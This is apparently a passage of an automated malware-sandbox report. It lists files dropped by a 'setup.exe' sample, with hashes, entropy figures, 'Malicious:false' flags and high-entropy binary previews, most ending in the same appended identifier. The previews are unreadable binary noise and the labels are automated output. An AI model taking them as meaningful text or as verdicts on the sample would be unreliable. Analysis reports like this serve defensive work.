              SSDEEP:12:SzaNBDfqfgjmV3elEELgMeiKFuiJf0HAPETk/6g4MxkWu+aWEXK1mh+4+MXsMR2X:Sza76D3elEELgTFocEwSg4MxcBXK31bD
              MD5:21712D82FFAC41D772AAA15AA7DB0DC2
              SHA1:D8803B222532CD38A7882B58EE5440E3F6BCCA4D
              SHA-256:97294DFE5F65F857E2EF6ADDD0585D534CACB8732BEBFC3261379D2D5F9928D0
              SHA-512:27135B16091F97FF104C827E18BEFCB0F7088E66B9AB1D0710ADD9141EB9D9893217CFDEDDFAF8FEBFCDD1A26198B4466E74E7B384689A7B9C8429C9618C678B
              Malicious:false
              Preview:<?xml...1.\..6.8@.=of..A?W...e.}.d.....H.&...0.....s@..h....W......G...."Ad.._.d.....%....!="D_=.M.,..%K...<.{...........E.3]...ZQ...Y...dE....l..1f...!.vP\..@.. .QY..T.-..%..8;o..{.c...S.. ..V...7i)#.....v.X.?....u..g.....VD:o.l..?-..45.#.'.........8.....s........vQk.....>H.A....X...1.v.R.......i(....J~.. ~....D....4#...(...R.W.....p.S......W.=#8..>.#o..i.Z,G.....o.r.3+a.bO..p...E...1..giW.O..O%^.$..r.,..X.V..=N....U........Pe.6.U...E..A..,..?....?a\..v.y.......".|.......zk.!.....{..:..?p..n.....I....L.5y ..0K.N...|.....z....N.~..n.(.x.......}...[..1;T..o!Q.?..LkA.;.9.......N..h=.x..r.(.~..o?.a_.Hm...?D].)'.....A.i.%.V.#d.1u..\3'a|t=...Hd.@f.5.XT.._.3......DrA..u|...|..........u..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):749
              Entropy (8bit):7.742300100643557
              Encrypted:false
              SSDEEP:12:NqH9k3yoaUuE+oIq9FRyLCW3IASHedl60LYsbaCeMNHdTbYZQJK83ssMR2cii9a:wdsCoV9by2W3UYjbaMZWqE831bD
              MD5:5E4CAA7C43301370DF19EE8B2D9AC6E7
              SHA1:02DA077510C09719E29AD2EAFFB8B718018B1BBB
              SHA-256:E3A63FF9CD28C70793F5AD91504E11F544BAB688D89B02FF002A54569DBABF39
              SHA-512:A16349B4A6CA2B149140065C0EF8F278BD4820A27044729A237A68D2483E85BFF897AF110D95E0238BF2B5B2A075836402D9B030E5B7BBEF39FC9769D92E1756
              Malicious:false
              Preview:<?xml..3..6...'wn......$l]8y*u....$......O.9a;i.......^..0O.Z.....8....~G..KF...D..j{...M..o..1......G..,..Z..5....KXh.I|.p.....C..U.V.s..:.U......%..H9..MA?..T.....5.C.#G...R;..P...J....(]........P.O..V.....G...D.+....B.}.............\\.@.`....#}.....W.....u.<\I..Iy....2...'s.l..'g.\3..A.Q+........@.~.e)..../......|....:'[H...Y....OU.T......~.../....=.Q..z...K.1.:(x....y.E..c.Ta.).&..u...........D2N..S....a..Ifk.l.WDM....^r..W..!..X...<>].8}.~yA..!@..N.....q....@.'.}..c.].s...U...k...,...7.{.9.....{...U....~&.....h.=k.> .#~..v....F...t....~.;[7n/...".....G.....e]...0P0XA..g....;5...............;9.>%!.#..J.u.,.ZMm...e...)u.Z[.?....H9VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.701430550677424
              Encrypted:false
              SSDEEP:24:C0Do6P8Cwy5wCz6VOLCSXQ+44fqbm+//pHbD:CsP8C5wCz6c9XQPbF/dD
              MD5:0975AFA450DA8F8C53E081ADEF7CD1FB
              SHA1:7140B459ADA61FFAABCD249D46781EB1FCC6F085
              SHA-256:619B40B6F75A0D0A28581502E6C21B66329745BDFB78B9657900D7AF1B5B2DFF
              SHA-512:27E7FE4629C2089F08B278137F7D3E17AD74CCC4FC1EBC21C67713415FB522A4336D7A9739E0C29ACB03E7150D80EC2223DC1764C050795B3125B9DC219EA4A4
              Malicious:false
              Preview:<?xml..K.Q..5\.f..G4*.."J!.....S..`.6xj.J.\h.EzQ.aW8dg.L......Y...[y...=OvE.>Ab...F...Ha.E.?.x..5H{,JEAM.{...h.2.CBAV...[...Ov..O.._$......y..Xkk.F0u.lxg..@...vL5Q.#..L.o.9".j.. ....Y4c...-Z. %T..p...$..9Z../x.\.,.3..;.....:.U.i..pR..=.F...NR4S..Fh..............{y .=$1..1.c..t.n.l.Y..4....I\.:..mt|.#.z.L\z..=....x...7#K.-..X..Y.+.I....Q.i...O..k.$n..).jEhF.F....'+..#.[x.g?.......F2Z.:....r.+/A8....V..{*..Vw..B.AGFU.. g}r.....o..B7.;kq......L."L......O....(.=.......A.....02.)...o...;mQ.4./^I....]...+M)...]..%tD.....&Y/.(#.R.UeJH..O!.R2c....B*0f.....CW. .]..4=%*.-..V...cF.Mc...f.&...B....2.....c<......7*.9....U...X...7...k...z.p>6...........,q.....5@j.....y..........f..B.....8I..].F..].L.*VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):765
              Entropy (8bit):7.686526540583005
              Encrypted:false
              SSDEEP:12:mI8G8HEVM4KfnbfEaUPSo8E4ocJOxtoLhJSRhvdP8hjRKF+4SvkZ+ON10S3rJgoW:m4fLGbgPSzE7xG8hvNb+EEONh7qbD
              MD5:CEDF12F64F13E36574DD08023CBD6B91
              SHA1:C439970AC01B67AE143D4AEDC7CFB7833C5BFD3A
              SHA-256:D0A57EC8917DFBE2B6A8E133C61114B35FD43657FFBE6B515BAA58E3862195AC
              SHA-512:1E9B59FA4154E9CEE27C55B8A6063EB3A1D6448A6FBECFC95B39CFBBC28749BA881AABCEC5EF2C0BCB56FEF60D74F8432328C9A680403B5F27592E5175412065
              Malicious:false
              Preview:<?xml....Z..xzY..W....*jC....hr47.?.4.T|...(..X.^../.B......".\....z9.3...G.....#*....7..M..>.C...eD....R..g9.s....$....saK..n.K../...~g.Mz.}.:5l. .zV`..s....l><..s.._.~Y.B1m..p..+.W.S....{o.&3*....C..e!..Q.1..#F...-.._..:.V.....}?..1.......4MH.G...]..)1r.'2....e.n.U.....c..f .].;... .7.. .x5.>sq...o.........k..B.Z.n..Ijl@...I..oi.Zv....0'Jur.~..q.T..h .]...b.9..s..Id_^.Y..VwF.ysR.F|./......M$.q.D+f.a..w..>...E;.>`..%..6........l.|.....uA..]`.x#.v...P..{HL*]..+....K....h.d.=&.....W.`..^.B./..W.iK*...../.+..n&.H.......Z.R...}EG....vk.d}.....N...{G.."wCW.........|.[8.U.....h9....._.1..A.F..cV...c..;UI..`....;..)...........~...5.g."..<....GGt...r.qVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):808
              Entropy (8bit):7.736398106356405
              Encrypted:false
              SSDEEP:12:UdFUR9LucDqczFx/lJHNBQ3pTP/q1UpWLJRoBM69zRoz5sMR2cii9a:eUjLpqcBxntu35P/q1/YBlozmbD
              MD5:14FDACB856F4C469C70DB5213AC32BD6
              SHA1:D7EAEAC74D2360CA39E90D652529DA66C38EC17A
              SHA-256:D0BA54339A409D70F4E4EE9080573577B4336745B0F725F95ECCE4160166F1B0
              SHA-512:00F4ACBF8F905EFC467BEE8199D86ED0769F2D7726332778E5F8C13A5DEA5420FFC47F6A32B27A47341E64E458ACEAFFF25E6F8FD6B05C23905A99C43676736E
              Malicious:false
              Preview:<?xml)q........~[...P....H.....0..0.....{4a..s.[..fBmJ....Z[.U.@s.D9..wz...H..=!.h....*...^1E."?...;'m.1..H*K...P..n...G&..7.0C...$l.8aB.#...;..'.6..|...&..1....z..yE.......7.h...HB....X....."@..W..\....X.##... ..$B...>....:..p|.t.|.....|...P..+.f.....4.....).._Ci....:......\i ..{.....NJ.a%.@..v...7.~.K~..T..(..]2...a....'...^.7.u......6W.0..b..m.(&.%.`..N.d...l..(..L..5.O.47.../....cR....C2".7.IZ.).,..q..I.3...+C..omc.7..{5...Hh...-`..x.b...a.B.J.j.p.<HsP./.N.(y.n6.'O.. ,..k.{U.9....p......}W..~.C.\Y..s.8L1..K.{h......f.g.'..e....+...DL..h...N...+.8..F...5.T..)5...FO..;.P..w.......{....x...../..X5../....s.w.5.K.....".I Z.~W...)/@\.@......Gu.........h..v..bZ.4....4.^[1.R.r4../.....v[VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):760
              Entropy (8bit):7.744207196172876
              Encrypted:false
              SSDEEP:12:OjzWICWvw1+jqEuwyy1zO88pn0iz5C46EaEAjd0RUZFsWCAxzsMR2cii9a:+RIYjawyyhCn0inadd0RjWCDbD
              MD5:21295865E04CDF31ED15453E373DCD9A
              SHA1:42B0CAC7197E106E1A9EFF8B0A0E2B7D110F0DAB
              SHA-256:54B90AF9E4CE98F25CD624DF00E21BF502AAEB3736DBF31F4ED1C114234E51FE
              SHA-512:16AA5C63B1DF2BE29E413A5391C2B660F450BE533BC5C9FADCC13FFA8FEAEDCD5172633E39D9A43E7A830B6D9F8155811BE3CC2B69E3FA5F9F80B7B3DD29EF8A
              Malicious:false
              Preview:<?xml...AI3.[|......@..`MF.().......y....NW.......Y.M..M.j,.Q.K.,k.FP6.......q..Z./D..<..bw|4g...O.n:.~F..@q*.......)..{./.......M...R..J&B.....~.....a.<.....j .<MU=>.!...f...y.Nx...=...(v...V.....1.....)v.#X...d.[....iV...r1..^...X...2+.0[.a..'..6...a..t...f.:..r.e.AT.@._..{..#........R..}e>..N#W....kM.2...mM..@k(S..pg..]d.y....i.u...0.Ho..otvD....?...a2rk...Nhw.$."....8..#..k..c.....Fk.._....1..t,....._...99S..L.y.-.L,._.%G^...rQ.|.B.A...jn..3.48.L3.g....,7"..F.+.%"...e...t...ZB^.......ie..r......*..R.6...}7.U3(V.RS2......@..%3.H...}..^.xJZ....".k*..r.dM.>......-..p-.....g..te.u'.&.....!.U....V......DpkfTL!.q.;..c ..=...jO..R2.......`VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.7448644291874205
              Encrypted:false
              SSDEEP:12:vj5yB2pZKZ3jv3eMPJHwdr7KjkVBma9N2Y5y+oIuLigXlocjY5DJrN/635SCsMRw:roUo3jv7R6ZVBmlJmgLYZJp/4AbD
              MD5:BAE170F21BAE21DCFC25ABB55EB0601A
              SHA1:C5E111089AB8E50A1E01F1AEC38DB990020DDE3D
              SHA-256:C2E8B11BBC0C3E643D3FEFD093A7EA875A1945F682605AC4900550E77A3D2F71
              SHA-512:3D86A1DC82A6777A2F7263815E6C5A14DF6BCA83D51A4659E305974DC466C1FAF2BD93AFC4E46341778B4CE743FBE67FAA2BD1EC4910E2F704AE3FF55CDFD466
              Malicious:false
              Preview:<?xml..#..+.".....v..rj.. S.....`.....$..)..Rx.R......b<....Qz.P..g..ZO....5@mx...(0...C'...n...G.t..(..l......Tr.`..!|.. ..Gw%u.7.Q;^....r1.....+.2v..29....,....D`..@-....V#eE.tX kZ..d...9a1.{.FB..q ......J.8).(6...P.l..r.7...9.jw._....|.wt..8.P~F.....T..@..n.r....6\.*t.X....N..p.<..m$}..9..AT......L)..xo...B..,..ubI.+:...^....-..=.vD=.A..F..k..}.2.l..R...:#.vU..n'C.....k.....\........6.......2V....M....P6j.._....4#.:(.0.k........bN$.A.V....u.Jw.OF.V... .../.-......~W.S1CU.N9..........[(zP..M.I~.....v.....5..@YH...6...HDyg...G..{..?F.c|.6..R......+w..j2.........d.=.]"W&M.HZ.?._./.G ...s.Pl..}EV.3.r.>lSK.. .sY3.......Ja......1.!.)..7.._?.`...b.<.t..nr..m!...K..6.z....\6..2...IS,n.....gVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):752
              Entropy (8bit):7.6847421393293756
              Encrypted:false
              SSDEEP:12:nVCJqmPDWstaXTD911LYosPhPfm+H/0kBmcvmu/Nk7IJlyFPIQMzsMR2cii9a:VCpaX1L1cLVBHvt/OqWPqYbD
              MD5:13E16716FED49CDDC77E9201978A9314
              SHA1:B86AE54D5C7B6442775C3ED87E8B3BEAD44A9EAF
              SHA-256:C9E6B8F7978BBC7393578B1FACCB42869CF512B75639798D18B40F33B3AFBB8D
              SHA-512:720D48D0A38F10E6AF27DDE53FEB5F57D97348C8E249FCB21E8A06EB1EB3D137C3AA7C58BBDBC881BF6FBDE2947FAF9B9381C93AB8C5BC5D8C691E1490AD71B3
              Malicious:false
              Preview:<?xml...;~..(....w...C#.A..B..Z8..>.xH.X..0..../cL.{..!q._....A8.B.'.\>.. ?...c.D...h%eX..\..s.*...W.......Rv...Mn.....?......47..?...c.....#bm...%jW.y.AoU_2.VC.3^9`34..d~.k.j..~..2.+....O..G'......~....jW.)..'.{.C.R. ....V.4..r....n.B.G....+....p..>...v..rR...LI)X.O.hKm%0.....t.g....sb.E........j<.7.z..?...nN.Qh<..F%L......N....2...6.e...T..?......!*....\.......].....CAe...d..<.....c..8.......Hu\..W...G.Q.........Vc.U#Z...W....Q.......5........I........)...(o..2.....F*B.......B..~!...8#.\..&.}w75..........)."..-.09...R.....z..O...^T\...'..tKF...%.>W.....p...H_.q...ht.......vI..>!1.../.$...+q|..R......}....._.5.o......-..]......j..^VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):805
              Entropy (8bit):7.714256830563698
              Encrypted:false
              SSDEEP:12:g42xpE8W6ZA1jLHhg5Pw0GR9vBK1FSkJnKtkb/W+iVpmdcTkdQuqueR0XNzsMR2X:gvbWx1j+i/9vUFSCnKw/W+oIdUDDtbD
              MD5:BD8BE9CE032F49ECD52677A18B009DB6
              SHA1:62400D07E3687BF3AFFCDC55DADBF0B8A7649736
              SHA-256:6AFA3C704421542BA4F8EB23FEED7BF0054CEEDA59786D5BD06C2B1F71F81988
              SHA-512:A4E78B1E3D545A6791FCE67A413205F78EAC091BDCF019CC7BF46DE54DEF9FA69B5EA09C4414B56C8202EBA1BCCEEAAEBE442F268BB3BA4AEEAA1CAFA41395A0
              Malicious:false
              Preview:<?xml........* ..._.F..+0.x.-s..jZ`..:.i.+..fl.....l6...#ae]..iX...9.....y.o+,..7..#/n.,.W3l#&.M+...G..H...t.@.Z...j...d.^@.=h]c|=i.>...?.[.hn..1M.!..bT..q.......x.|../.p)*d(S&.D1....&..H.zG.wX`..w.......(..0.T....:.."<.........(...?.@.g-<.l...a.p......2..t.......\yN..]..Z.M......|.4SIn.+.n6.[..X..Kg.....qe...C.D....J-.y.t..g.I...Y.}..'........yqs..h./.[-"$48....p...] .>>.<.....C&5Vu1E..`.R...S._.1WE .6./.+.*.....o<..n. 21.....a...t....I......./[..v...!.a9..|.&Z.}RuP{.:..4.*..=..$f:k.?...~...[...&.6-.....RsYh.q...lKo.r8...w.C.s`.N.T}H....?...6T...k.e.k..l'3G...w .VP.\....i.t.Q........L.[CG....z."g..-@.u.("8.K.!.7../....{D.....Y..+d...S.5..d....<t.~U....&t,{~...&.{.....;!..)..f.C....c.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):738
              Entropy (8bit):7.657802614654217
              Encrypted:false
              SSDEEP:12:hmJ5thJIYcpN08jAP6iQJEzFazraCR5d/dzS88yiafdRgRIW/5xAsMR2cii9a:AtnP6NqzFaz2CRP/ZS88y7fdSuEbD
              MD5:4FF6403FB282ABB588B2CD2F1467903D
              SHA1:27516CC467EEF506C325AFBE4ECAFFDD193E82EB
              SHA-256:3C8FECF0E03977F679064F975E90C84F8DBF60E228F128395B39846E1CB80063
              SHA-512:1083BD2889AC65D5D84022BC59F00B725732F7AB419029C500435AA35EE1907596474FAE1F2F9ADFFBD212A0A4C603D54C79B8844518C967E1F6A3571EA5E3FD
              Malicious:false
              Preview:<?xml...cj..+.~.....w....D.L*...z....^3..6.)....02f)..#.\.Ie:..0.C.6.-.Nb.=L....cz...q.\G.3.[..t`.J.....=u`.....pDt...I...P-.?...Y.0.U.r8.X.X..<.+..e..eN..:.\.N3..J....W|+...t-..$C..0.*...0.o...6K......'9O..:.....w.H...}Q..`.*.g.+..4..6.0+...ueX{-k...4...c.....6...TV.P.H.{.Z...!X{..}Kb..{uS..k...#..!..M...5V.n..r{.*%=..b*....@.q.d..vi9..Zg..g..=.;....F.....O.r.p..W$...S..g8rQ.......l.O'..r....`...9.f&.Fc.>.b...16...'g/...}..}........d.B...0..N...!........k.....x1d|.be.YZk.3......~.Y.A.0.\U..:.'.d7.AW.....k<...^....R{qC..T.w"{V..[.\#.`:9.D.3..F:...'..^G{..?w...4H.p.*.2...m.....`...>S....mj..i%....u[....t.u..>Ae.%GZ..N'VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):801
              Entropy (8bit):7.723883380778225
              Encrypted:false
              SSDEEP:12:IUxKhqvik+e1NYOU5QQ7kAx3JiT1f3FPUd8T2e3/zutFThuy20q7NoUu89lGL1sV:IUxn+R/5jowi1vFMavPaOE8mLSbD
              MD5:0AC75F71EB3D5DECCB69D884093EABEF
              SHA1:FE3F50B15A324FE9BFA4E7382575176EC330E47E
              SHA-256:72C422B3F7F7BA2F453B8C7CADE34F1FA8E0FF53B61D9C21EF03571864E4E7EA
              SHA-512:D786EA0C4BCAEED9AF410182B16AEF84F2B5A2CD28D4E68D41C2692E6FF38D1AA822CF0D40028DF2BFF2E7904C0D49998C25E09F434554816D340EDA7B495DF2
              Malicious:false
              Preview:<?xmlu..]...I...m....A.F...C>...o.....`2..[....~.WC.....U..k..UE.;p..P'~.1.wc..I/...n..mO.... ...#...h...e...g..^/.<..i{..V4.Pqe.sMv3...v..;..+.,.....Pu.../.....dhs.....Y.D(...#.C.....Cp..^.(..CJ..I..Oh....9.5...d.....W.m..*.hdS...|c..QFj...c.k{..j.w....V}.A.J....Q .Rp.....V.4.K.<...>.O.<.<..,?_.......o...M......>.z.k..r...{.L.RE....sP.*B_..k.*Vkx..qR. H>.).....gfs.G.R....f.....)...=.[.....=..U:.......r...k..q...r.(f#HY.pw!7.B.........fU...].4M....t.3....R"B.11...T...9..,.J.::. ...`G].77tn)..Pu.Ga.Z....n.<BQtd...f.."i......f.u..$.....=j...C..u..Zk......O6..M@.M.......&.....U.........m........(.B.$...n..-...I.....CdGT~...4....<._...y...a..A..0!;...n..|.......7#.W;..[......VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):507
              Entropy (8bit):7.577121384222018
              Encrypted:false
              SSDEEP:12:SzyI5jQkSl1OHjqB4IC18mNwHl4/asMR2cii9a:Szz54Cc4pWHe7bD
              MD5:A5B64D34C2F38882BEEF5797073955CE
              SHA1:6CD09187142734EBCC8ECDFD069EAA7224DF94B1
              SHA-256:59345BEC8C3EF9570354E7595E63D6C50C9B58EDAEDB39C84346703080F295F1
              SHA-512:E5E9452EF80B0187FC6C8B42C99BAC4898A8604629503BE6EB66D1A84033B89685C1A162E6B368DF704A68226D6B472BA2ABB7D98C67A9EF9D4A1D56D2DBF882
              Malicious:false
              Preview:<?xml.......O...AE..l.....N.[.[...R}....".Y;%....b.......3.@...}v...n...#9......l..I.i.V....?ng.....o...6.+...i,:.ZX..9g.G..L.y&.S..H......iE}.j~........p..a!8....=l..Z.[...k.x.F.z".u...d...9E..z...A..f..M....2_. q.s.....O.dmA..n)e....$.%..p.^..7.x@J......9.u..(".S,...1.L...A..d@....@.)\o.,".k.Lf.i.........)?...n]...]J...A..'.L.S7..YMW...y......b.@.....v...\...6..d.:=....NS$.s].......o7......Z..m..d..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):2285
              Entropy (8bit):7.9146339655460745
              Encrypted:false
              SSDEEP:48:wjkfV1LhwoXLniSLrsbz8Ax1jQmu7hfmVsKAjxgRcLG6nw5DiCD:wU1LNTiSLmzLrjQmu7huVvc+4K3
              MD5:4F86F6573841EC60278DB01C06E823C2
              SHA1:55EC0E85C4301BA45A9C90E57539F9AF00A5A3F6
              SHA-256:56EF63790D02403679F895F3E1C41EA51FE9E97997BC66348E71332807259F84
              SHA-512:531D5D3E691C5C396ADE863A12E7FD9405A4CD948B875EAEF601B72C341977CECD8591DD61676EE96952C6014A3CCDC9BD7FEDD46EC0974BB467176BC727C86B
              Malicious:false
              Preview:<?xmlM.Au.K$....Rs!.9..)........&..$J!..A....3p.N.M...]M:.]].`IN......."........(..1.....ny.7w..^....`.c.VxE..'+...__d.{=.<_i.A...!.=K....m...{).`p...v.5. ....x..<QI<.LH...{.n.h......t8....(*....G.....@..".#...T..2.[...9..@......2..&...*syH.Nl...{Fi.Q.k%<.7&.."....i..3o6.<..u..QxY.r......>l.,.i....;.}4..3......:..W...1..*.e\..i..5.YN...I.b|.`.6...\iE.o4..6.w...kM.;N...55..X..[Q.u.7.n`...Y..*...xU./.S..m...%.c...7....B#....(*.r........M.....`).]~9....O@4......^../r....7.L.....V).0]...~#[(..x..Q.p...Mc..V...`.zt..9...s.^._a...g.....1iq..............W..........q..^..5...f#)H.S.....f.)..?...r..D.. .."W..C.....Ez.\%..%.[k...bL.@...g..pM......I......r2sF.6.?+.z..h.{1.c>.`b.s....."$".5..D...b&...S....o....j.Ti*d...5o...;..Mp3.g...PW..m)...^Z.......Z{...@.......L.U..G5..R.9..D..}.T..9.\._.'.#.p......*s.=..$[.Uk..a.s~..X[..).g.%.0.o.......nc/Ore[r.....Y...6... =.d83..J)...59.V..YeH;^`..aNI..6..O..y../..p.f..A.<.ty.t..U.."#+)...|&..A_..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1291
              Entropy (8bit):7.847361846662742
              Encrypted:false
              SSDEEP:24:G29eabLe+diyTJADwnu2t9itMLR/RoOMaKoIfI3ca1qb93poKbD:G2vbrcyTJCwDt9itKRp7MYIwcAqnrD
              MD5:2B4D9E2AC2B0C91186DD8D8EAF67BE32
              SHA1:EBDE267D497DA9AFA1293C193A6CBD1EBECF5ACD
              SHA-256:2808EE8EB95E9CBB6699F70485319AC936153441EEEA2BDCFFCD5B031B1D91B4
              SHA-512:F72E1C454A9540C1BB7FFCD5F4E35A5C6B4555D38FCA3250497EE2401C0F37EE3B9AE4DC09B00973B0A25C7EF0F22C254E34543E0CC70C41AB8790F0488FD65D
              Malicious:false
              Preview:<?xml.D...!..-....v.cf. h..%>...p.J. f....[.z..r%.h.b.G..N.3..#Y.|c.(....d.....+Jk.!J.g.$..gF...8.r.T.d:.C.}T.K..`f..j....J`;....O.....(*.8..-7...Q.,.Z"oB...,.).`.?I..\.`....V.K...K.i...%`m..xK..._!..,..K.c=.+Y...r..,..z..@(.......K..1#zP.(...@IISI..S..U......@~L...`I...xe......<..A....z........b#.._.`.....6........t......,,.....(..ZP.#...^K7[.....j1z.h. 3.2.cq._9...p.(d.l"Q";...G&.x2...p.^)..h...;.TYc.*...[.M..x.R..(e.Wa.XA.g`.......M9.Od%.JhC...K..X..3...D.:(.t.n.HkO...Z..`....n.....L.Wt4.....aq..w.......?9....E.JF....T.......u.4R.8b.....C..eq...s...M.z.*..Y..d. .Dn=....AQ.......&..`..i....Pv.........."@<...X.....>m..T.B.,......e.....a...D..=.....E4........#....&l.XN........|%..w..Z...w4u.`...j.....k...l.x....=...U...L...8.......9.0..m..w..F..i..2.5...A[[..i#l.].7.9;8....G..Vp.0.A............d.5.x....J.\....Fm....A.j.cf.dh....j......s!.a.W}z....Cy+..A.._r<..T...q/X.7`K..1 .0sh.H.Z....7.3;j........X..HL...?L....._.GF@9....^".w....P...1
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):834
              Entropy (8bit):7.757008541982683
              Encrypted:false
              SSDEEP:24:CBUvsPXOgKyqrAWLaiCRSX3P6kWfqF/8FD+umo6bD:wUvstw1P6qF/8Fvmo4D
              MD5:8B215BBD91D4205A0679E7D108A470DE
              SHA1:A8F473B1C084888271F875C1A15DBCA15C96258B
              SHA-256:9D1D44AA52C4A3A108C4BDDE3FABD0BD35E61B954E1F25DDF422FB3F12FFD18C
              SHA-512:A6C485B856486A42852B06A18E53E78A602DA6453CDDA0A0337D34CFE6F1B4F075F0AAC05B6A9CDCF2D92480323070DC7A9F08E0AF45ECBC0786F98E4E19B666
              Malicious:false
              Preview:<?xml.\s....B.$.y..T.g.....m.(3.Z^.p|f~2.(v.td..g$......?P.x.\.,....Lc...h...0..9..d.;9Y...=........S...w...2.-.1r)..a6Bn..&.6...pq=}vs..h.V...i..RC......d...N7[.....=._a....l+.>4..).....B.30.9.c....b..|$.|..M.......C.#I.n~.9.......vw.;.dX'...+ .B..w.m3.-.6...5....M.n....().J)+ZS{$~."}.F.......kL..s=...?...3....2.&...ha...SA..E.`@..Zj~...+.R..(ml.f..{..tX....].^..O.kwt...(..L.{..7....<.N.>p......t.....V.9........bl......v...U..-Ve..^.I..d.N....y...s.\w..j..W...D...;.T$..r. @...u.F....vp.{.]....gI].....Z...;.v2...c..1....).K.7.._U..,. ..t'...Z'/...w-..}N.A8.9.kC.I.....15.nU........hg.-.-.)'.Y,k-..:\.A..>...0A....l../.M..`.k....[.,.LM...3..gy.~.)...\...+.!%.../.P.T...g..DK.>n..[...".`..}.F..).p.b.....!.9/G3VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):630
              Entropy (8bit):7.621570214411718
              Encrypted:false
              SSDEEP:12:0BiRw4zmU4xbI23bxYnNtKn4t0qXDF4b3PIt1qOUXibPEVNzsMR2cii9a:0BiRVX4xBYNyY0Bb/9Xig3YbD
              MD5:EEF5B60F8C1F2383A3A141C9F24AA328
              SHA1:9C698DB0E831E67DC42437C685E27D5096D6220A
              SHA-256:9A6F20F6F1906CF6450D6663D8869C13F5C738C13FA4F91F322674556DAF2798
              SHA-512:D7A17E83F0AD42B3B70BED739DEECC0E0FD31445AE4E82A44344A35E3FE831DAFACAE52947E8E4611BD09509C98FD15D7A95704C98802987711F01000E5FAC9D
              Malicious:false
              Preview:<?xmlo%..i=^.4xc.[..T.-#<......g/.@..jbc.x...m.......J..`..:Y......l?....+@Q...T.p.iG..Wy.om[....G.k....=$.r.aS...'W..a..v...UO.2.bZY..j.Q...,2.h.6.].S.[z.""......P:....c.$...Hx^..ft.a0...O.....TX........N.MR.S[|..J...:6G.e(.Nb..e...8..h.=..c.b..[.{..^..........1..*.p5o.oc...Eq..Qf....$...iL.E.c...F..bw..gyGQWb.|.F....aM...'..hS`M.....?+.R...@kx....K...w..)__......J.y.i.z+F...j..........En.w.=.......eZ...z....Lf*.r..!V.......f,.uc..,./+.Ff6%L+(..eY>.o.{$.r.c.M.5.....V..~P/.y:0T......K.l.o..//..=%.".....G#.-.'...PGyFVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):851
              Entropy (8bit):7.704420362195783
              Encrypted:false
              SSDEEP:12:tgs/W7ZBjKPLKd9vX4mHcASfMbxZUvLy9TXNAm+6zzkSec0zMhiIrO+mX/j/Zjcu:mVlKPLKdF4NAkLKNMSec+MhiCmv7LbD
              MD5:82608697F9380D8799E2D22513966D8A
              SHA1:2B9C5EEBD92B90BE816B4F6090ECCDCA5E59593C
              SHA-256:A787780CED481C58F2AED15100B918848ECFC038076819D523711764C375D5CB
              SHA-512:AF2F3487E216167516FD4117752641CE1DA14092F751428E5FF2F3D372597924432B36579E66A2D00B139992F39BA08186D19D2CC2E8787EB597388E730F44E4
              Malicious:false
